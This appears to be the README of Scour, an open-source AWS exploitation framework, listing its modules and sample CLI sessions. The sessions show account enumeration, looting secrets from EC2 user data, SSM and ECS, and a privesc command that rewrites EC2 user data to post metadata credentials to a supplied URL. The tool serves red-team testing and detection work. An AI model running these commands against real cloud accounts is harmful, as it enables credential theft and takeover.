Scour is a modern module based AWS exploitation framework written in golang, designed for red team testing and blue team analysis. Scour contains modern techniques that can be used to attack environments or build detections for defense.
Features
- Command Completion
- Dynamic resource listing
- Command history
- Blue team mode (tags attacks with unique User Agent)
Installation
Scour is written in golang so its easy to ship around as a binary.
##Gettable
go get github.com/grines/scour
##Build
go build main.go
For a more detailed and user-friendly set of user instructions, please check out the Wiki’s installation guide. **coming soon
Scour’s Modules
Scour uses a range modules:
- Operations (2)
- Enumeration (7)
- Privilege Escalation (3)
- Lateral Movement (2)
- Evasion (5)
- Credential Discovery (4)
- Execution (2)
- Persistance (7)
- Exfiltration (1)
Notes
- Scour is supported on all Linux/OSX.
- Scour is Open-Source Software and is distributed with a BSD-3-Clause License.
Getting Started
The first time Scour is launched,
Basic Commands in Scour
token profile <profile_name> <region>
will list the available aws profiels stored in ~/aws/credentials.token AssumeRole <role_name> <region>
will assume role from same or cross account. ** requires active sessionhelp module
will return the applicable help information for the specified module. **help TBDattack evasion <tactic>
will run the specified module with its default parameters.
Running Scour From The Command Line
scour
will enter cli modeNot Connected <> token profile apiuser us-east-1
sets the session to use for commands that require oneConnected <apiuser/us-east-1>
actively connected to an aws profile from (~,/aws/credentials) in (region)Connected <apiuser/us-east-1> attack enum <attack>
tab completion with list available enumeration tacticsConnected <apiuser/us-east-1> attack privesc <attack>
tab completion with list available privilege escalation tacticsConnected <apiuser/us-east-1> attack lateral <attack>
tab completion with list available lateral tacticsConnected <apiuser/us-east-1> attack evasion <attack>
tab completion with list available evasion tacticsConnected <apiuser/us-east-1> attack creds <attack>
tab completion with list available credential discovery tacticsConnected <apiuser/us-east-1> attack execute <attack>
tab completion with list available execution tacticsConnected <apiuser/us-east-1> attack persist <attack>
tab completion with list available persistance tacticsConnected <apiuser/us-east-1> attack exfil <attack>
tab completion with list available exfiltration tactics
Enumeration
Connected <apiuser/us-east-1> attack enum IAM IAM discovery
+————-+———————+——————+—————+————–+
| USER | MANAGED POLICIES | INLINE POLICIES | GROUPS | ISPRIVILEGED |
+————-+———————+——————+—————+————–+
| admin | AdministratorAccess | AllEKSInlineuser | SecurityAudit | true |
| EC2 | AmazonEC2FullAccess | | true |
+————-+———————+——————+—————+————–+
Connected <apiuser/us-east-1> attack enum Roles
Roles discovery
UA Tracking: exec-env/EVSWAyidC4/o18HtFPe1P/role-enum
+————————————————————+—————-+—————————————————–+————–+
| ROLE | PRINCIPAL TYPE | IDENTITY/SERVICE | ISPRIVILEGED |
+————————————————————+—————-+—————————————————–+————–+
| Amazon_CodeBuild_dW6zqYHT3m | AWS | [arn:aws:iam::861293084598:root | true |
| | | codebuild.amazonaws.com] | |
| Amazon_CodeBuild_f2DOFPjMHK | Service | [codebuild.amazonaws.com] | true |
| Amazon_CodeBuild_HS59ko7lxn | Service | [codebuild.amazonaws.com] | true |
+————————————————————+—————-+————————————————–—+————–+
Connected <apiuser/us-east-1> attack enum EC2
EC2 discovery
UA Tracking: exec-env/EVSWAyidC4/dudqW7y1xb/ec2-enum
+———————+—————————————————–+————–+———-+—————+———————-+——–+———+————–+———-+
| INSTANCEID | INSTANCE PROFILE | VPC | PUBLICIP | PRIVATEIP | SECURITY GROUPS | PORTS | STATE | ISPRIVILEGED | ISPUBLIC |
+———————+—————————————————–+————–+———-+—————+———————-+——–+———+————–+———-+
| i-0f5604708c0b51429 | None | vpc-7e830c1a | None | 172.31.53.199 | sg-09fcd28717cf4f512 | 80* | stopped | false | true |
| | | | | | | 22* | | | |
| | | | | | | 5000* | | | |
| i-03657fe3b9decdf51 | arn:aws:iam::861293084598:instance-profile/OrgAdmin | vpc-7e830c1a | None | 172.31.45.96 | sg-61b1fd07 | All* | stopped | true | true |
| | | | | | | 8888* | | | |
| i-01b265a5fdc45df57 | None | vpc-7e830c1a | None | 172.31.38.118 | sg-0392f752f9b849d3f | 3389* | stopped | false | true |
| i-0867709d6c0be74d9 | arn:aws:iam::861293084598:instance-profile/OrgAdmin | vpc-7e830c1a | None | 172.31.39.199 | sg-006543a34d2f70028 | 22* | stopped | true | true |
| i-0d95790b5e7ddff23 | None | vpc-7e830c1a | None | 172.31.12.57 | sg-e1a50dac | 33391* | stopped | false | true |
+———————+—————————————————–+————–+———-+—————+——–
Connected <apiuser/us-east-1> attack enum S3
S3 discovery
UA Tracking: exec-env/EVSWAyidC4/GDGZaYQOuo/s3-enum
+——————————————-+———–+———–+————–+————-+———————+————-+————-+———–+
| BUCKET | HASPOLICY | ISWEBSITE | ALLOW PUBLIC | PERMISSIONS | ALLOW AUTHENTICATED | PERMISSIONS | REPLICATION | REGION |
+——————————————-+———–+———–+————–+————-+———————+————-+————-+———–+
| amazon-conn3d79b01a | false | false | false | | false | | false | us-west-2 |
| aws-cloudtrail-logs-98-cb39df0d | true | false | false | | false | | false | | | bullsecu | true | true | false | | false | | false | | | connect-6ecad67 | false | false | false | | false | | false | |
| connect-5337c3 | false | false | false | | false | | false | | | ransom | true | false | false | | false | | false | |
| red* | false | false | false | | false | | false | | | rep-** | false | false | false | | false | | false | us-west-2 |
| terraform* | false | false | false | | false | | false | |
+——————————————-+———–+———–+————–+————-+———————+————-+————-+———–+
Connected <apiuser/us-east-1> attack enum Groups
Groups discovery
UA Tracking: exec-env/EVSWAyidC4/jAIKVdESpU/groups-enum
+———————————————–+———————+————–+—————–+————–+
| GROUP | POLICIES | ISPRIVILEGED | INLINE POLICIES | ISPRIVILEGED |
+———————————————–+———————+————–+—————–+————–+
| EC2 | SecurityAudit | false | | false |
| OpsWorks-dac9e9ba-8b3d-4e04-9ad9-d988ca4c0731 | | false | | false |
| TestGroup | AmazonEC2FullAccess | true | | false |
| | SecurityAudit | | | |
+———————————————–+———————+————–+—————–+————–+
Connected <apiuser/us-east-1> attack enum Network
Network discovery
TBD
PrivilegeEscalation
Connected <apiuser/us-east-1> attack privesc UserData i-0f5604708c0b51429 http://url.to.capture.post.data
steal metadata credentials from EC2. Stop instance / Update userdata to post credentials to supplied url / Start instance (sends EC2 token to URL.)
[Sun May 9 06:10:16 2021] INF Stopping Instance i-0f5604708c0b51429 – State: stopped
[Sun May 9 06:10:46 2021] INF Modifying Instance Attribute UserData on i-0f5604708c0b51429
[Sun May 9 06:10:47 2021] INF Starting Instance i-0f5604708c0b51429 – State: pending
CredentialDiscovery
Connected <apiuser/us-east-1> attack creds UserData
loot credentials from EC2 userdata
UA Tracking: exec-env/yzaqX9HFvP/oL1oho99ZP/userdata-creds
+———————+——————+——————————————————————————-+
| INSTANCEID | RULE | FINDING |
+———————+——————+——————————————————————————-+
| i-0f5604708c0b51429 | Slack Webhook | https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX |
| i-0f5604708c0b51429 | Generic Password | password=thisisapassword |
+———————+——————+——————————————————————————-+
Connected <apiuser/us-east-1> attack creds SSM
loot credentials from Systems Manager
UA Tracking: exec-env/yzaqX9HFvP/FASongUCcG/ssm-params-creds
+————+———-+———————-+
| PARAM NAME | DATATYPE | VALUE |
+————+———-+———————-+
| Test | text | thismightbeapassword |
+————+———-+———————-+
Connected <apiuser/us-east-1> attack creds ECS
loot credentials from ECS
UA Tracking: exec-env/9tsJFrIPmw/rEGaMfF5AI/ecs-creds
+————-+——-+————+
| ENVARS NAME | VALUE | DEFINITION |
+————-+——-+————+
| Secret | heere | sample-app |
+————-+——-+————+